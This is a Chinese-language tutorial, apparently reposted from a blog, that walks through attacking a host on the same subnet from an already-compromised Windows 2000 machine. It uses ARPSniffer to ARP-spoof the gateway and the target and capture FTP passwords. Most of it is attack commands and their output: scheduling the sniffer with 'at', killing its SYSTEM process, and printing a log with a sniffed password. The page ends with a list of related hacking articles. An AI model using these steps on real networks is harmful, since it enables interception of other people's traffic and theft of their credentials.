假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已通过漏洞获得权限的主机IP是:61.139.1.88并可以3389登陆。
第一步:
tracert 61.139.1.1
C:/WIN2000/system32>tracert 61.139.1.1
Tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]
Trace complete.
这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能
进行ARPSNIFFER了
第二步:看本机IP设置和网卡情况
C:/WIN2000/system32>ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : smscomputer
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Intel Fast Ethernet LAN Controller – onboard:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.139.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.139.1.65
DNS Servers . . . . . . . . . . . : 61.139.1.73
说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以知道网关是61.139.1.65
第三步:查看本机时间
C:/WIN2000/system32>net time //127.0.0.1
//127.0.0.1 的当前时间是 2003/1/28 下午 09:13
命令完成成功
要注意的是这儿的时间是12小时式,用at命令应要24小时式
第四步:编写启动ARPsniffer的bat文件
C:/WIN2000/system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:/winnt/a.bat
注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
Usage: ArpSniffer [/RESET]
第五步:后台运行开始嗅探咯
C:/winnt/system32>at //127.0.0.1 20:44 c:/winnt/a.bat
注意:这儿的时间要用24小时式
arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
执行完第四步要先安装WINPCAP 2.1驱动
同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子
第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉
以SYSTEM权限启动的ARPSniffer程序
C:/winnt/system32>pulist
……………….
conime.exe 248 NT AUTHORITY/SYSTEM
explorer.exe 1864 SMSCOMPUTER/Administrator
CSRSS.EXE 2256 NT AUTHORITY/SYSTEM
Arpsniffer.exe 2322 NT AUTHORITY/SYSTEM —-就是它了!
WINLOGON.EXE 2344 NT AUTHORITY/SYSTEM
………………….
杀了它
C:/winnt/system32>pskill 2322
PsKill v1.03 – local and remote process killer
Copyright (C) 2000 Mark Russinovich
Process 2322 killed.
C:/winnt/system32>type 1.txt 我的例子中嗅探的是FTP密码:)
……………
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
…………
…………
特别要注意的就是PASS哈:)
—————————————————-
付录:
前台正常执行的显示
C:/>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
Network Adapter 0: Intel(R) 8255x Based Network Connection
Enable IP Router….OK
Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88
有时这儿要先显示can not open driver(0)不管它等一下就可以了
Begin Sniffer………

附录arp原理示意图:

转载于:https://www.cnblogs.com/mujj/articles/1966156.html

ARP监听渗透内网的方法相关推荐

  1. 从外网打点到渗透内网域控 NASA

    文章目录 从外网打点到渗透内网域控 NASA 前言 任务说明 靶场拓扑 环境搭建 外网打点 端口扫描 使用 masscan 扫描全部端口 使用 nmap 扫描全部端口 目录扫描 后台测试 社工生成字典 ...

  2. 内网渗透-内网环境下的横向移动总结

    内网环境下的横向移动总结 文章目录 内网环境下的横向移动总结 前言 横向移动威胁 威胁密码安全 威胁主机安全 威胁信息安全 横向移动威胁的特点 利用psexec 利用psexec.exe工具 msf中 ...

  3. [技术博客]使用微信机器人监听群内招聘信息的过程及遇到的问题

    概述 本篇博客主要介绍如何使用python的wxpy库,在其他博客代码的基础上,通过网页版微信,监听某个好友或微信群中,满足特定要求的消息,并集中转发至制定好友处. 感谢作者"猪哥" ...

  4. PostgreSQL数据库服务端监听设置及客户端连接方法教程

    众所周知,PostgreSQL 是一个自由的对象-关系数据库服务器(数据库管理系统),是一个可以免费使用的开放源代码数据库系统.本文详细介绍了PostgreSQL数据库服务端监听设置及客户端连接方法, ...

  5. 安卓开发学习日记 DAY5——监听事件onClick的实现方法

    今天主要学习了监听事件的是实现方法,就是说,做了某些动作后,怎么监听这个动作并作出相应反应. 方法主要有三种: 1.匿名内部类的方法 2.独立类的方法 3.类似实现接口的方法 以下分别分析: 1.匿名 ...

  6. Android 关于ListView中按钮监听的优化问题(方法二)

    关于ListView中按钮监听的优化问题(方法一)地址: http://www.cnblogs.com/steffen/p/3951901.html 之前的方法一,虽然能够解决position的传递, ...

  7. common-io-2.0的新功能之文件监控FileAlteration(文件监听的两种实现方法《很全的监听文件例子》)...

    common-io-2.0的新功能之文件监控FileAlteration(文件监听的两种实现方法<很全的监听文件例子>) 转载于:https://www.cnblogs.com/rocky ...

  8. Android Studio 基础 之 获取蓝牙Bluetooth 的状态,设置的蓝牙Bluetooth 的开关状态,并监听蓝牙Bluetooth 的状态变化方法整理

    Android Studio 基础 之 获取蓝牙Bluetooth 的状态,设置的蓝牙Bluetooth 的开关状态,并监听蓝牙Bluetooth 的状态变化方法整理 目录 Android Studi ...

  9. element-ui 官方文档内网部署方法

    element-ui 官方文档内网部署方法 获取官方文档github地址并下载 本地安装部署 由于公司开发处于内网环境,查看element-ui的官方文档非常不方便,因此希望将其部署到内网,方便使用, ...

最新文章

  1. Fedora 15 安装与配置一览
  2. c语言写程序计算表达式的值,C语言 写的 表达式求值。
  3. go语言中go+select的理解
  4. 《Python Cookbook 3rd》笔记(5.20):与串行端口的数据通信
  5. python主成分分析法实训报告_基于 python 的主成分分析步骤及应用实例
  6. mysql 重要维护工具 图解
  7. MySQL 索引的原理与应用:索引类型,存储结构与锁
  8. VScode下载及安装完整教程(详细版)
  9. Java面向对象编程
  10. 不得不知的高速PCB设计中各类地的处理方法
  11. 迅雷一些版本下载链接
  12. Unable to instantiate service com.baidu.android.pushservice.PushService: java.lang.ClassNotFoundExc
  13. 合天网安实验室CTF-解密100-Funny Crypto
  14. 改进型脉振高频注入源码 stm32工程 脉振高频注入是一种通过在d轴注入正弦电压
  15. autojs联众识图
  16. C++实现扫雷(最简单版)
  17. python3正则表达式替换_在Python 3中加速数百万的正则表达式替换
  18. jqGrid实现单选功能
  19. Java工程师需要掌握哪些知识呢?
  20. ISO9001认证多少钱?

热门文章

  1. scrapy.response
  2. requests与bs4编码
  3. 在过去的12个月(2016)里,你用到的最多的算法或方法是什么?
  4. C++语言类的多态介绍和示例
  5. java 线程安全原子性_Java 线程安全之原子性
  6. mysql concat键值对_mysql中concat函数实现数据库字段合并查询
  7. vSAN 设计、部署、运维最佳实践 | 资料
  8. 技术分享——机房搬迁工作步骤及方案详解
  9. Veeam黑科技之Direct NFS Access
  10. Java Web学习总结(12)——使用Session防止表单重复提交